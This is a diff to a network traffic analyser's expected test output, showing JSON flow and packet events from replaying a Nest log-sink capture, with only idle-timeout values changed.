+00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536716592575,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":547,"packets-processed":424,"total-skipped-flows":0,"total-l4-data-len":43270,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1536716652586} 
00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":595,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":595,"packets-processed":452,"total-skipped-flows":0,"total-l4-data-len":43270,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":1536717254253} 
@@ -69,54 +69,54 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1536717427984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536717427984,"pkt":"AJD7JidrGLQwJjRACABFAABEMFAAAP8RJfbAqPIPwKjyAc5xADUAMGWoTp4BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1536717428084,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536717428084,"pkt":"GLQwJjRAAJD7JidrCABFAABUzkdAAEARBu\/AqPIBwKjyDwA1znEAQGW0Tp6BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1536717427961,"flow_last_seen":1536717428084,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1536717428084,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717428089,"flow_last_seen":1536717428089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717428089,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1536717428089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717428089,"pkt":"AJD7JidrGLQwJjRACABFAAAsMFEAAP8GGkzAqPIPI7yauvd0K1cJA0ANAAAAAGACEgCqTwAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1536717428146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717428146,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93SD5IA7CQNADmASbvBIIgAAAgQFjA=="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1536717428152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717428152,"pkt":"AJD7JidrGLQwJjRACABFAAAoMFIAAP8GGk\/AqPIPI7yauvd0K1cJA0AOg+SAPFAQEgC8pwAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717450091,"flow_last_seen":1536717450091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717450091,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1536717450091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717450091,"pkt":"AJD7JidrGLQwJjRACABFAAAsMG8AAP8GYgnAqPIPI65S7fd1K1cJDrE1AAAAAGACEgCA9gAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1536717450156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717450156,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93XProMNCQ6xNmASaQPV8QAAAgQFtA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1536717450159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717450159,"pkt":"AJD7JidrGLQwJjRACABFAAAoMHAAAP8GYgzAqPIPI65S7fd1K1cJDrE2z66DDlAQEgBEsgAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717428089,"flow_last_seen":1536717428089,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717428089,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1536717428089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717428089,"pkt":"AJD7JidrGLQwJjRACABFAAAsMFEAAP8GGkzAqPIPI7yauvd0K1cJA0ANAAAAAGACEgCqTwAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1536717428146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717428146,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93SD5IA7CQNADmASbvBIIgAAAgQFjA=="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1536717428152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717428152,"pkt":"AJD7JidrGLQwJjRACABFAAAoMFIAAP8GGk\/AqPIPI7yauvd0K1cJA0AOg+SAPFAQEgC8pwAAAAAAAAAA"} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717450091,"flow_last_seen":1536717450091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717450091,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1536717450091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717450091,"pkt":"AJD7JidrGLQwJjRACABFAAAsMG8AAP8GYgnAqPIPI65S7fd1K1cJDrE1AAAAAGACEgCA9gAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1536717450156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717450156,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93XProMNCQ6xNmASaQPV8QAAAgQFtA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1536717450159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717450159,"pkt":"AJD7JidrGLQwJjRACABFAAAoMHAAAP8GYgzAqPIPI65S7fd1K1cJDrE2z66DDlAQEgBEsgAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":711,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536717632764,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":727,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":727,"packets-processed":562,"total-skipped-flows":0,"total-l4-data-len":56297,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":12,"total-detection-updates":3,"total-updates":0,"current-active-flows":1,"total-active-flows":12,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":85,"global_ts_msec":1536717873194} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718052990,"flow_last_seen":1536718052990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718052990,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1536718052990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718052990,"pkt":"AJD7JidrGLQwJjRACABFAAAsMIsAAP8GYe3AqPIPI65S7fd2K1cJGivXAAAAAGACEgAGSAAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1536718053059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718053059,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93aQyd5SCRor2GASaQM+4wAAAgQFtA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1536718053062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718053062,"pkt":"AJD7JidrGLQwJjRACABFAAAoMIwAAP8GYfDAqPIPI65S7fd2K1cJGivYkMneU1AQEgCtowAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536718175916,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718052990,"flow_last_seen":1536718052990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718052990,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1536718052990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718052990,"pkt":"AJD7JidrGLQwJjRACABFAAAsMIsAAP8GYe3AqPIPI65S7fd2K1cJGivXAAAAAGACEgAGSAAAAgQEgAAA"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1536718053059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718053059,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93aQyd5SCRor2GASaQM+4wAAAgQFtA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1536718053062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718053062,"pkt":"AJD7JidrGLQwJjRACABFAAAoMIwAAP8GYfDAqPIPI65S7fd2K1cJGivYkMneU1AQEgCtowAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536718175916,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 